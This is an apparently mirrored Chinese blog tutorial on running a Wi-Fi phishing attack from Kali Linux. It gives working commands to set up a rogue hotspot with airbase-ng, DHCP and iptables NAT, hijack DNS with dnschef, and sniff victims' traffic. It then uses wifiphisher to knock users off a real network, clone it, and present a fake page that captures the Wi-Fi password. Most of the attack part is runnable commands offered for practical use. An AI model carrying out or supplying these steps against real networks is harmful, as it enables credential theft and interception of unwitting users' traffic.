zoukankan      html  css  js  c++  java
  • 电子证据 利用Kali进行wifi钓鱼实战详细教程

    电子证据 利用Kali进行wifi钓鱼实战详细教程

    一、 Kali系统安装和必要软件安装:

    二、利用kali建立钓鱼wifi:

    建立热点

    工具:isc-dhcp-server ;Aircrack-ng套件;iptables

    isc-dhcp-server上面已装,其他的kali自带。

    shell输入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打开文件命令,如没有这个文件,则创建。 
    写入如下内容: 
    authoritative;

    default-lease-time 700; 
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 { 
    option routers 10.0.0.1; 
    option subnet-mask 255.255.255.0;

    option domain-name-servers 10.0.0.1;

    range 10.0.0.10 10.0.0.100;

    }

    这里以10.0.0.1作为网关和dns服务器地址。

    然后我们处理无线网卡

    ifconfig wlan1 down #wlan1是你的网卡 这里意思是关闭wlan1网卡 
    iwconfig wlan1 mode monitor #设置wlan1网卡为监听模式 
    ifconfig wlan1 up #打开wlan1网卡 
    airmon-ng start wlan1 #启动wlan1网卡的监听模式 

    上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

    然后用airbase建立热点 
    airbase-ng -e Fishing -c 11 wlan1 #创建名为Fishing的热点,Fishing 自己改。 

    热点的网络流量会被虚拟到at0这块网卡上面 

    ifconfig at0 up #启用at0这块网卡 
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩码 
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由 
    echo 1 > /proc/sys/net/ipv4/ip_forward #打开ip转发 

    dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 
    service isc-dhcp-server start #开启 dhcp

    然后可以试着用手机连接,应该可以连上但上不了网

    于是配置NAT 
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat 
    iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面 
    iptables -A FORWARD -p tcp –(两个-)syn -s 10.0.0.0/24 -j TCPMSS –(两个-)set-mss 1356 #修改最大报文段长度

    注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)

    (这里可能还是DNS错误,请看后文中的dns代理服务器搭建)

    劫持DNS

    工具:dnschef

    过程:

    dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,对于所有请求转发到61.128.128.68进行解析。 

    然后就可以用wireshark等工具抓包啦!

    三、wifiphisher:

    (要买一个无线网卡,淘宝23元一个,团购免邮费) 

    这是一个wifi攻击脚本,详细介绍地址:https://github.com/sophron/wifiphisher

    先,我们来下载wifiphisher: 

    在shell框里输入命令: 
    git clone https://github.com/sophron/wifiphisher.git

    等待下载完毕,然后你可以在你下载的目录下看见wifiphisher这个文件夹。然后在这个文件夹运行 shell.

    输入命令:python bin/wifiphisher 
    如果是第一次运行脚本的话,它可能会出现提示安装hostpad的信息,键入Y继续安装即可。 

    完成的时候,再次运行Wifiphisher脚本。

    这次将运行8080和433端口的Web服务器,然后开始搜索附近的Wi-Fi网络。 

    等待搜索完成,我们会发现一系列Wi-Fi网络名。 

    然后按Ctrl+C 选择攻击的wifi

    出现1、2、3三种模式,这三种模式代表发送不同的验证页面给连接的用户,具体的页面文件在wifiphisher目录下的 attack page中。也可以自己写一个。 

    敲下回车,Wifiphisher会显示正在使用的界面,还有正被攻击及复制的AP所在的SSID。

    然后已连接件被攻击wifi的用户会被强制断开,wifiphisher会copy这个被攻击的wifi,做一个伪装wifi(原理就如第二步),然后断开的用户将会再搜索到的是这个伪装wifi,当他们连接这个wifi时会接受到一个验证页面(3种模式有3种不同的页面),然后会要求用户输入密码,当用户输入密码提交后,你将会看见这个密码。 

    如果他们连上这个伪装wifi,你就可以用wireshark等工具进行抓包啦~~!

  • 相关阅读:
    关于二进制包安装MySQL出现yum安装保护多库场景解决
    关于 Fatal NI connect error 12170 错误
    调优排故笔记1-利用等待事件及相关文件和视图-Oracle内核揭秘
    MySQL的四种隔离级别
    Oracle绑定变量
    接口加密测试
    接口测试用例设计
    学习总结——接口测试中抓包工具的使用
    学习总结——JMeter做WebService接口功能测试
    JMeter做http接口压力测试
  • 原文地址:https://www.cnblogs.com/haiyan123/p/8916523.html
Copyright © 2011-2022 走看看